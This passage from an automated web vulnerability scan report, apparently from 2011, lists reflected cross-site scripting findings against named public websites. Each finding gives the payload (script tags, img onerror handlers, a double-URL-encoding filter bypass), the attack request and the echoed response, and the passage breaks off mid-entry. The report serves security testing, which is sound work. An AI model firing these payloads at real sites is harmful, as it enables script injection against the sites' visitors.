The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5788"-alert(1)-"6c2d12cdf84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?a5788"-alert(1)-"6c2d12cdf84=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 02:47:26 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sun, 03 Apr 2011 02:47:26 GMT
Date: Sat, 02 Apr 2011 02:47:26 GMT
Content-Length: 21586
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/server-status?a5788"-alert(1)-"6c2d12cdf84=1";

           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.32. http://www.dailyjobposts.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dailyjobposts.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45714%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28fd38a3c43 was submitted in the REST URL parameter 1. This input was echoed as 45714"><script>alert(1)</script>28fd38a3c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status45714%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28fd38a3c43 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailyjobposts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:16:17 GMT
ETag: "6108580215792dd1a8e3719affb002dc"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.2
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
X-Runtime: 1272
Content-Length: 8215
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"
...[SNIP]...
<input name="query" id="query" value="server-status45714"><script>alert(1)</script>28fd38a3c43" type="text" class="textfield">
...[SNIP]...

3.33. http://www.diabetes.org/server-info [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.diabetes.org
Path:	/server-info

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce16"><img%20src%3da%20onerror%3dalert(1)>28e0b469b4e was submitted in the REST URL parameter 1. This input was echoed as 2ce16"><img src=a onerror=alert(1)>28e0b469b4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-info2ce16"><img%20src%3da%20onerror%3dalert(1)>28e0b469b4e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diabetes.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 01:56:30 GMT
Set-Cookie: NSC_dnt_901_qvc=ffffffff09041e0e45525d5f4f58455e445a4a4214f4;expires=Sat, 02-Apr-2011 02:56:30 GMT;path=/;httponly
Content-Length: 70292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="http://main.diabetes.org/site/UserLogin?NEXTURL=http://www.diabetes.org/server-info2ce16"><img src=a onerror=alert(1)>28e0b469b4e&s_AffiliateSecCatId=1&pw_id=3301">
...[SNIP]...

3.34. http://www.diabetes.org/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.diabetes.org
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40b4c"><img%20src%3da%20onerror%3dalert(1)>08e86f25cfd was submitted in the REST URL parameter 1. This input was echoed as 40b4c"><img src=a onerror=alert(1)>08e86f25cfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-status40b4c"><img%20src%3da%20onerror%3dalert(1)>08e86f25cfd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diabetes.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 02:31:09 GMT
Set-Cookie: NSC_dnt_901_qvc=ffffffff09041e0e45525d5f4f58455e445a4a4214f4;expires=Sat, 02-Apr-2011 03:31:09 GMT;path=/;httponly
Content-Length: 70296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="http://main.diabetes.org/site/UserLogin?NEXTURL=http://www.diabetes.org/server-status40b4c"><img src=a onerror=alert(1)>08e86f25cfd&s_AffiliateSecCatId=1&pw_id=3301">
...[SNIP]...

3.35. http://www.dipity.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dipity.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f5'-alert(1)-'dafe7939c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status747f5'-alert(1)-'dafe7939c50 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dipity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:08:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: pvc=prev%041301710116%03last%041301710116%03view%041301710116; expires=Thu, 29-Sep-2011 02:08:36 GMT; path=//personal/; domain=.www.dipity.com
Vary: Accept-Encoding
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns='http://www.w3.org/1999/xhtml' xmlns:fb='http://www.facebook.com/2008/fbml' ><head><meta http-equ
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2192351-3']);
_gaq.push(['_trackPageview','/server-status747f5'-alert(1)-'dafe7939c50/?_loggedin=0']);
//dipity.analytics.trackPageview('/server-status747f5'-alert(1)-'dafe7939c50/?_loggedin=0');

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; g
...[SNIP]...

3.36. http://www.docstoc.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.docstoc.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1632'-alert(1)-'a701da9b2ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusb1632'-alert(1)-'a701da9b2ee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: pages_visited=2; path=/
Set-Cookie: general=showTopIE9=2,1,4/2/2011 7:49:21 PM; domain=docstoc.com; expires=Mon, 02-Apr-2012 02:49:21 GMT; path=/
serverID: web04
Date: Sat, 02 Apr 2011 02:49:20 GMT
Content-Length: 15439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
sertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2fserver-statusb1632'-alert(1)-'a701da9b2ee';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

3.37. http://www.docstoc.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.docstoc.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b7c4'-alert(1)-'ee53a8104d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?6b7c4'-alert(1)-'ee53a8104d7=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: pages_visited=2; path=/
Set-Cookie: general=showTopIE9=2,1,4/2/2011 7:49:02 PM; domain=docstoc.com; expires=Mon, 02-Apr-2012 02:49:02 GMT; path=/
serverID: web02
Date: Sat, 02 Apr 2011 02:49:01 GMT
Content-Length: 15448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
tBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2fserver-status%3f6b7c4'-alert(1)-'ee53a8104d7%3d1';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

3.38. http://www.dorkly.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dorkly.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5af7"-alert(1)-"84052e722a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd5af7"-alert(1)-"84052e722a4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dorkly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:29:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 02:29:23 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=c185c9d7b2fed08531c7d4dce57f839ea0f2ea34; expires=Fri, 01-Apr-2016 07:33:14 GMT; path=/; domain=dorkly.com
Set-Cookie: jument_hash=c185c9d7b2fed08531c7d4dce57f839ea0f2ea34; expires=Fri, 01-Apr-2016 07:33:14 GMT; path=/; domain=dorkly.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" xmlns:fb="http://www.facebook.com/2008/fbml">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...
r","sec":"errorpage"};
       jument.ad_site = "5480.iac.dorkly";
       jument.cookie.domain = "dorkly.com";
       jument.home_url = "http://www.dorkly.com";
       jument.this_url = "http://www.dorkly.com/server-statusd5af7"-alert(1)-"84052e722a4";
       jument.user_id = 0;
           </script>
...[SNIP]...

3.39. http://www.education.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.education.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f36e"%3bb89bfbb523a was submitted in the REST URL parameter 1. This input was echoed as 5f36e";b89bfbb523a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /5f36e"%3bb89bfbb523a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 02:56:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=vdhcn75bhq2ir5o4a1i29j7pu3; expires=Sat, 02-Apr-2011 12:56:41 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Tue, 14-Jun-2011 02:56:41 GMT; path=/
Content-Length: 140362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="5f36e";b89bfbb523a";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

3.40. http://www.elyrics.net/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.elyrics.net
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac896<script>alert(1)</script>f28f1124825 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusac896<script>alert(1)</script>f28f1124825 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:58:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1175
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
<a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/server-statusac896<script>alert(1)</script>f28f1124825</font>
...[SNIP]...

3.41. http://www.elyrics.net/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.elyrics.net
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4385<script>alert(1)</script>25840b24127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?e4385<script>alert(1)</script>25840b24127=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1178
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
<a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/server-status?e4385<script>alert(1)</script>25840b24127=1</font>
...[SNIP]...

3.42. http://www.foreignpolicy.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foreignpolicy.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d74"><script>alert(1)</script>bf786f3728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusd8d74"><script>alert(1)</script>bf786f3728 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreignpolicy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=600
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301711396"
Last-Modified: Sat, 02 Apr 2011 02:29:56 GMT
X-AH-Environment: prod
Content-Length: 34307
Date: Sat, 02 Apr 2011 02:29:56 GMT
X-Varnish: 1611585047
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<meta property="og:url" content="http://www.foreignpolicy.com/server-statusd8d74"><script>alert(1)</script>bf786f3728"/>
...[SNIP]...

3.43. http://www.foreignpolicy.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foreignpolicy.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe716"-alert(1)-"4e07d34ce49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusfe716"-alert(1)-"4e07d34ce49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreignpolicy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=600
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301711397"
Last-Modified: Sat, 02 Apr 2011 02:29:57 GMT
X-AH-Environment: prod
Content-Length: 34279
Date: Sat, 02 Apr 2011 02:29:57 GMT
X-Varnish: 1611585179
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<!--
s.pageName="fp - /server-statusfe716"-alert(1)-"4e07d34ce49";
s.channel="fp - unknown";
s.hier1="www | uncategorized";
s.hier2="foreignpolicy.com | www | uncategorized";
s.prop2="";
s.prop3="article";
s.prop5="";
s.prop12="";
s.prop25="";
s.prop32="drupal";
s.
...[SNIP]...

3.44. http://www.gamespot.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4962"><script>alert(1)</script>46b1785cfba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusc4962"><script>alert(1)</script>46b1785cfba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:46:06 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 02:46:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040111=2; expires=Tue, 05-Apr-2011 02:46:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/server-statusc4962"><script>alert(1)</script>46b1785cfba" />
...[SNIP]...

3.45. http://www.gamestop.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gamestop.com
Path:	/server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cc2d5'%20a%3db%20fd858b9849e was submitted in the REST URL parameter 1. This input was echoed as cc2d5' a=b fd858b9849e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-statuscc2d5'%20a%3db%20fd858b9849e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:55:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 02:55:11 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: CampaignHistory=; path=/
Content-Length: 181776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com:80/server-statuscc2d5' a=b fd858b9849e' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

3.46. http://www.gamestop.com/server-status [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.gamestop.com
Path:	/server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3791f'><script>alert(1)</script>3fcd38dd666 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?3791f'><script>alert(1)</script>3fcd38dd666=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:54:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Fri, 02-Apr-2021 02:54:53 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: CampaignHistory=; path=/
Content-Length: 181839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com:80/server-status?3791f'><script>alert(1)</script>3fcd38dd666=1' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

3.47. http://www.gather.com/server-status [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.gather.com
Path:	/server-status

Issue detail

